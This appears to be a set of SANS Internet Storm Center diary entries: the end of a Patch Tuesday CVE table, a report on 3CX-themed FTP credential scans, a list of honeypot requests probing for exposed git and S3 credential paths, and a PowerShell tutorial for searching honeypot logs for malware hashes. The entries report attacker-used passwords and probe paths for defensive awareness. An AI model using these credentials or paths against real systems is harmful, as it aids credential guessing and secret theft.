KubeVirt VMI Denial-of-Service (DoS) Using Pod Impersonation
%%cve:2025-64435%%	No	No	-	-	Moderate	5.3	5.0
Libxml2: namespace use-after-free in xmlsettreedoc() function of libxml2
%%cve:2025-12863%%	No	No	-	-	Important	7.5	7.1
Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability
%%cve:2025-62206%%	No	No	-	-	Important	6.5	5.7
Microsoft Excel Information Disclosure Vulnerability
%%cve:2025-60726%%	No	No	-	-	Important	7.1	6.2
%%cve:2025-60728%%	No	No	-	-	Important	4.3	3.8
%%cve:2025-59240%%	No	No	-	-	Important	5.5	4.8
%%cve:2025-62202%%	No	No	-	-	Important	7.1	6.2
Microsoft Excel Remote Code Execution Vulnerability
%%cve:2025-60727%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62200%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62201%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62203%%	No	No	-	-	Important	7.8	6.8
Microsoft Office Remote Code Execution Vulnerability
%%cve:2025-62199%%	No	No	-	-	Critical	7.8	6.8
%%cve:2025-62216%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62205%%	No	No	-	-	Important	7.8	6.8
Microsoft OneDrive for Android Elevation of Privilege Vulnerability
%%cve:2025-60722%%	No	No	-	-	Important	6.5	5.7
Microsoft SQL Server Elevation of Privilege Vulnerability
%%cve:2025-59499%%	No	No	-	-	Important	8.8	7.7
Microsoft SharePoint Remote Code Execution Vulnerability
%%cve:2025-62204%%	No	No	-	-	Important	8.0	7.0
Microsoft Streaming Service Proxy Elevation of Privilege Vulnerability
%%cve:2025-59514%%	No	No	-	-	Important	7.8	6.8
Microsoft Visual Studio Code CoPilot Chat Extension Security Feature Bypass Vulnerability
%%cve:2025-62449%%	No	No	-	-	Important	6.8	5.9
Microsoft Wireless Provisioning System Elevation of Privilege Vulnerability
%%cve:2025-62218%%	No	No	-	-	Important	7.0	6.1
%%cve:2025-62219%%	No	No	-	-	Important	7.0	6.1
Multimedia Class Scheduler Service (MMCSS) Driver Elevation of Privilege Vulnerability
%%cve:2025-60707%%	No	No	-	-	Important	7.8	6.8
Nuance PowerScribe 360 Information Disclosure Vulnerability
%%cve:2025-30398%%	No	No	-	-	Critical	8.1	7.1
Storvsp.sys Driver Denial of Service Vulnerability
%%cve:2025-60708%%	No	No	-	-	Important	6.5	5.7
Visual Studio Remote Code Execution Vulnerability
%%cve:2025-62214%%	No	No	-	-	Critical	6.7	5.8
Windows Administrator Protection Elevation of Privilege Vulnerability
%%cve:2025-60718%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-60721%%	No	No	-	-	Important	7.8	6.9
Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
%%cve:2025-60719%%	No	No	-	-	Important	7.0	6.1
%%cve:2025-62217%%	No	No	-	-	Important	7.0	6.1
%%cve:2025-62213%%	No	No	-	-	Important	7.0	6.1
Windows Bluetooth RFCOM Protocol Driver Information Disclosure Vulnerability
%%cve:2025-59513%%	No	No	-	-	Important	5.5	4.8
Windows Broadcast DVR User Service Elevation of Privilege Vulnerability
%%cve:2025-59515%%	No	No	-	-	Important	7.0	6.1
%%cve:2025-60717%%	No	No	-	-	Important	7.0	6.1
Windows Client-Side Caching Elevation of Privilege Vulnerability
%%cve:2025-60705%%	No	No	-	-	Important	7.8	6.8
Windows Common Log File System Driver Elevation of Privilege Vulnerability
%%cve:2025-60709%%	No	No	-	-	Important	7.8	6.8
Windows Hyper-V Information Disclosure Vulnerability
%%cve:2025-60706%%	No	No	-	-	Important	5.5	4.8
Windows Kerberos Elevation of Privilege Vulnerability
%%cve:2025-60704%%	No	No	-	-	Important	7.5	6.5
Windows Kernel Elevation of Privilege Vulnerability
%%cve:2025-62215%%	No	Yes	-	-	Important	7.0	6.5
Windows License Manager Information Disclosure Vulnerability
%%cve:2025-62208%%	No	No	-	-	Important	5.5	4.8
%%cve:2025-62209%%	No	No	-	-	Important	5.5	4.8
Windows OLE Remote Code Execution Vulnerability
%%cve:2025-60714%%	No	No	-	-	Important	7.8	6.8
Windows Remote Desktop Services Elevation of Privilege Vulnerability
%%cve:2025-60703%%	No	No	-	-	Important	7.8	6.8
Windows Routing and Remote Access Service (RRAS) Denial of Service Vulnerability
%%cve:2025-59510%%	No	No	-	-	Important	5.5	4.8
Windows Routing and Remote Access Service (RRAS) Elevation of Privilege Vulnerability
%%cve:2025-60713%%	No	No	-	-	Important	7.8	6.8
Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
%%cve:2025-62452%%	No	No	-	-	Important	8.0	7.0
%%cve:2025-60715%%	No	No	-	-	Important	8.0	7.0
Windows Smart Card Reader Elevation of Privilege Vulnerability
%%cve:2025-59505%%	No	No	-	-	Important	7.8	6.8
Windows Speech Recognition Elevation of Privilege Vulnerability
%%cve:2025-59508%%	No	No	-	-	Important	7.0	6.1
Windows Speech Recognition Information Disclosure Vulnerability
%%cve:2025-59509%%	No	No	-	-	Important	5.5	4.8
Windows Speech Runtime Elevation of Privilege Vulnerability
%%cve:2025-59507%%	No	No	-	-	Important	7.0	6.1
Windows Subsystem for Linux GUI Remote Code Execution Vulnerability
%%cve:2025-62220%%	No	No	-	-	Important	8.8	7.7
Windows Transport Driver Interface (TDI) Translation Driver Elevation of Privilege Vulnerability
%%cve:2025-60720%%	No	No	-	-	Important	7.8	6.8
Windows WLAN Service Elevation of Privilege Vulnerability
%%cve:2025-59511%%	No	No	-	-	Important	7.8	6.8
can: hi311x: fix null pointer dereference when resuming from sleep before interface was enabled
%%cve:2025-40107%%	No	No	-	-	Moderate	5.5	5.5
container escape due to /dev/console mount and related races
%%cve:2025-52565%%	No	No	-	-	Important
containerd CRI server: Host memory exhaustion through Attach goroutine leak
%%cve:2025-64329%%	No	No	-	-	Moderate
containerd affected by a local privilege escalation via wide permissions on CRI directory
%%cve:2024-25621%%	No	No	-	-	Important	7.3	7.3
crypto: rng - Ensure set_ent is always present
%%cve:2025-40109%%	No	No	-	-	Moderate	4.2	4.2
missing SFTP host verification with wolfSSH
%%cve:2025-10966%%	No	No	-	-	Moderate	6.8	6.8
mruby array.c ary_fill_exec out-of-bounds write
%%cve:2025-12875%%	No	No	-	-	Moderate	5.3	4.8
runc container escape via "masked path" abuse due to mount race conditions
%%cve:2025-31133%%	No	No	-	-	Important
runc: LSM labels can be bypassed with malicious config using dummy procfs files
%%cve:2025-52881%%	No	No	-	-	Important

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Today, I noticed scans using the username "FTP_3cx" showing up in our logs. 3CX is a well-known maker of business phone system software [1]. My first guess was that this was a default user for one of their systems. But Google came up empty for this particular string. The 3CX software does not appear to run an FTP server, but it offers a feature to back up configurations to an FTP server [2]. The example user used in the documentation is "3cxftpuser", not "FTP_3cx". Additionally, the documentation notes that the FTP server can run on a different system from the 3CX software. For a backup, it would not make much sense to have it all run on the same system.

The scans we are seeing likely target FTP servers users set up to back up 3CX configurations, and not the 3CX software itself. I am not familiar enough with 3CX to know precisely what the backup contains, but it most likely includes sufficient information to breach the 3CX installation.

The credentials we observe with our Cowrie-based honeypots are collected for telnet and ftp. In particular, on Linux systems, you often use a system user to connect via FTP. Any credentials working via FTP will also work for telnet or SSH. Keep that in mind when configuring a user for FTP access, and of course, FTP should not be your first choice for backing up sensitive data, but we all know it does happen.

Here are the passwords attacks are attempting to use:

Password	Count
3CXBackup	4
3CXbackups	4
telecom	1
testbackup	1
backup3cx	1
ebsftpuser	1
ftp_cxn	1
ftp_inx	1

Here are some other "3cx" related usernames we have seen in the past:

Username
3cx
3CXBackup
3cxbackups
backup3cx
ftp3cx
FTP_3cx

If anyone with more 3CX experience reads this, is there a reason for someone to use these usernames? Or are there any defaults I didn't find?

[1] https://www.3cx.com
[2] https://www.3cx.com/docs/ftp-server-pbx-backups-linux/

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

This is just a quick diary entry to report that I saw requests on my honeypot for (code) repositories:

/.git/logs/refs/remotes/origin/main
/.git/objects/info
/.github
/.github/dependabot.yml
/.github/funding.yml
/.github/ISSUE_TEMPLATE
/.gitlab/issue_templates
/.gitlab-ci
/.git-secret
/.svnignore
/aws/bucket
/s3/backup
/s3/bucket
/s3/credentials

So watch out what you publish online when you deploy a repository to your web site.

 

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

[This is a Guest Diary by David Hammond, an ISC intern as part of the SANS.edu BACS program]

My last college credit on my way to earning a bachelor's degree was an internship opportunity at the Internet Storm Center. A great opportunity, but one that required the care and feeding of a honeypot. The day it arrived I plugged the freshly imaged honeypot into my home router and happily went about my day. I didn’t think too much about it until the first attack observation was due. You see, I travel often, but my honeypot does not. Furthermore, the administrative side of the honeypot was only accessible through the internal network. I wasn’t about to implement a whole remote solution just to get access while on the road. Instead, I followed some very good advice. I started downloading regular backups of the honeypot logs on a Windows laptop I frequently had with me.

The internship program encouraged us to at least initially review our honeypot logs with command line utilities, such as jq and all its flexibility with filtering. Combined with other standard Unix-like operating system tools, such as wc (word count), less, head, and cut, it was possible to extract exactly what I was looking for. I initially tried using more graphical tools but found I enjoy "living" in the command line better. When I first start looking at logs, I was not always sure of what I’m looking for. Command line tools allow me to quickly look for outliers in the data. I can see what sticks out by negating everything that looks the same. 

So, what’s the trouble? None of these tools were available on my Windows laptop. Admittedly, most of what I mention above are available for Windows, but my ability to install software was restricted on this machine, and I knew that native alternatives existed. At the time I had several directories of JSON logs, and a long list of malware hash values corresponding to an attack I was interested in understanding better. Here’s how a few lines of PowerShell can transform scattered honeypot logs into a clear picture of what really happened.

First, let’s start with the script in two parts. Here’s the PowerShell array containing malware hash values:

$hashes = @(
"00deea7003eef2f30f2c84d1497a42c1f375d802ddd17bde455d5fde2a63631f",
"0131d2f87f9bc151fb2701a570585ed4db636440392a357a54b8b29f2ba842da",
"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b",
"0291de841b47fe19557c2c999ae131cd571eb61782a109b9ef5b4a4944b6e76d",
"02a95dae81a8dd3545ce370f8c0ee300beff428b959bd7cec2b35e8d1cd7024e",
"062ba629c7b2b914b289c8da0573c179fe86f2cb1f70a31f9a1400d563c3042a",
"0be1c3511c67ecb8421d0be951e858bb3169ac598d068bae3bc8451e883946cc",
"0cbd5117413a0cab8b22f567b5ec5ec63c81b2f0f58e8e87146ecf7aace2ec71",
"0d2d316bc4937a2608e8d9a3030a545973e739805c3449b466984b27598fcdec",
"0d58ee0cd46d5908f31ba415f2e006c1bb0215b0ecdc27dd2b3afa74799e17bd"
)

The $hashes = @( ) between quoted, comma-separated values, establishes a PowerShell array of strings which represents the hashes we want to search for. Now let’s look at how we put this array to use.

Get-ChildItem -Path "C:\Users\Dave\Logs" -Filter 'cowrie.json.*' -Recurse |
ForEach-Object {
    $jsonContent = Get-Content $_.FullName
    write-output $_.FullName
    foreach ($hash in $hashes) {
        $searchResults = $null
        $searchResults = $jsonContent | Select-String $hash
        if (![string]::IsNullOrEmpty($searchResults)) { 
            write-output $searchResults 
        }
    }
}

Let's walk through the execution of the script. The first statement, Get-ChildItem, recurses every folder in the specified path (C:\Users\Dave\Logs\) and passes along all filenames that match the filter argument. Each filename is passed through the "pipe" (|) directly into the first ForEach-Object statement. You can see what’s passed by observing the output of the write-output $_.FullName line. The $_ is a variable designation which represents whatever is passed through the pipe. In this case, we know what kind of data to expect (a filename) so we can access it’s attribute, "FullName". This tells us the specific JSON log file currently being searched.

Now let’s get into the meat of the script. The main body of the script contains two nested For-Loops. The outer loop begins with the first "ForEach-Object" block of code. The inner loop is described by the lowercase "foreach" block. We already know the name of the JSON log we’ll be searching next, so the next line, $jsonContent = Get-Content $_.FullName sets that up to happen. It takes the content of the first filename passed to $_ though the pipe, reads the contents of that filename, and stores the text in a variable named $jsonContent. Now we’ve got our first log to search, all we have to do is run through the list of hash values to search for! This takes us to the point of the script where we reach the inner-loop. The foreach inner-loop is similar to the outer loop with the exception of how it processes data. The statement, foreach ($hash in $hashes) takes each hash value found in the $hashes array and puts a copy of it into $hash before executing the code block it contains. 

When the inner-loop runs it does three things. First, $searchResults = $null empties the value of the $searchResults variable. This is also called "initializing" the variable, and it’s a good practice whenever you're working with loops that re-use the same variable names. Second, with the variable clear and ready to accept new values, the next line accomplishes a few things.

        $searchResults = $jsonContent | Select-String $hash

Starting to the right of the equals sign, we’re passing the JSON log text $jsonContent into the command "Select-String" while also passing Select-String a single argument, $hash.  Remember earlier when the lowercase foreach loop started, it takes each value found in the $hashes array and (one at a time) places their values into $hash before executing the block of code below it. So we’re passing the text in $jsonContent through another pipe to Select-String, which takes that text and searches for the value $hash within the contents of $jsonContent. The results of Search-String are then stored in the variable named $searchResults.

        if (![string]::IsNullOrEmpty($searchResults)) { 
            write-output $searchResults 
        }

Third and finally, we have an if statement to determine whether the prior Select-String produced any results. If it found the $hash value it was looking for, the $searchResults variable will contain data. If not, it will remain empty ($null). The if statement makes that determination and prints the $searchResults it found. Note the ! at the beginning of the statement which tells it to evaluate as, "if not empty."

While compact in size, this script introduces the PowerShell newcomer to a variety of useful functions: traversing files and folders, retrieving text, searching text, and nested loops are all sophisticated techniques. If you save this script, you can adapt it in many ways whenever a quick solution is needed. Understanding the tools that are available to us in any environment and having practice adapting those tools to our circumstances makes us all better cybersecurity professionals.

[1] https://www.sans.edu/cyber-security-programs/bachelors-degree/

-----------
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.